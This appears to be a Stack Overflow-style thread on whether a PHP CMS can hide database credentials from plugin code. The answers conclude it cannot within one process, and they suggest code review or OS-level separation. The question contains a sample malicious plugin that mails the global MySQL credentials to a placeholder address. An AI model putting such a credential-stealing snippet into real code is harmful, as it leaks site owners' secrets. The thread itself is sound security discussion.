# Protecting variables from stealing in php

Tags: php, security, plugins, content-management-system

I have a question which is bounching in my mind since a long long time.
I'm on a CMS project and I really don't know how to do this:
I want this cms to be mod-able by using a plugin system, nothing difficult until now.
Well, I now have this question how can i protect a variable/constant like mysql password of the admininstrator user?
For example, in the file settings.php i have

```
$mysql = array("user" => "admin"...);
```

How can I make a class not to read it?
A simple class (plugin) could do

```
class myplugin extends plugin_container {
function badfunction() {
mail("my bad address", "data stolen", $GLOBALS["mysql"]);
}
```

A simple plugin, in this way, can steal the user's sensible datas. How can i fix this ?

Comment: You can't, and there is no point in trying to find a *technical* solution to this. If you trust plugin-code to execute in your app, it necessarily has access to the current environment. You should be reviewing 3rd party code to make sure it isn't attempting to steal credentials or otherwise compromise your server.

Answer (score 2, accepted):

You can't really do this in PHP. You can put the varible in an object, make it private, but using Reflection, other code can get it as well. Hell, even if it couldn't, there are still ways to get object's internals when you shouldn't, like `var_dump`, `debug_zval_dump`, and more.

I would suggest either:

- discard the password after you connect to the database (and load modules *after* you connect)
- store it somewhere else than memory (a config file), but that doesn't solve anything, since the plugin can still access that config file
- give up and say "modules are trusted" -- that's probably what all CMS do
- some more weird method - sandbox modules, run the as separate process with dropped unix privileges, virtualize them... I guess any of this is not practically useful

Generally, when your code runs in some context (like in a PHP script) and you want to allow some module or plug-in to run in the same context, there is no way to hide anything. The plugin will have access to the same memory (all the variables), all open resources (database connections) and it will basically be indistinguishable from any other code in that context. The same applies to many other contexts, e.g. a native process running in an OS. Of course you can make it "harder" to get some variable or resource, but you can never ensure it can't be accessed. Unless you run the other code in a different context (other process, virtualization, ...).

Comment: Then, after dropping, I would have no passwords, yep, but I still have (for example) the mysql link which HAS to be on for plugins too.
Is there a way to hide that link for sure; I tought of something like a class which understand where its own function has been called or something like that

Comment: Thanks, it was really useful (over 1 year of think gone in one second, at least I'm now calmer.).

Answer (score 3):

You can't... Plugins can execute code and you can't control that code.

You can however approve one-by-one the plugin, to avoid potentitial issue.

Answer (score 1):

Although you can try changing the scope of $mysql to some local scope - getting the data by calling a function like this:
    function mySafeBox() {
         return $mysql;
    }
now, the plugin code won't be able to access it from $_GLOBALS, but there's no point in doing so...since you ARE relying on the plugin by using it...this way, you won't ever find a good 'solution' to this problem, which never existed

Answer (score 0):

PHP offers no facility for internal security boundaries. Most languages are like this; an exception would be Java.

So if you want to build a trust boundary in a PHP script you would have to do it via OS-level privilege separation mechanisms: spawn a process running under a separate user principal with lower privileges, and use a pipe to communicate between that and the main trusted app. This would require a load of architectural rework that doesn't fit within the usual PHP invocation model.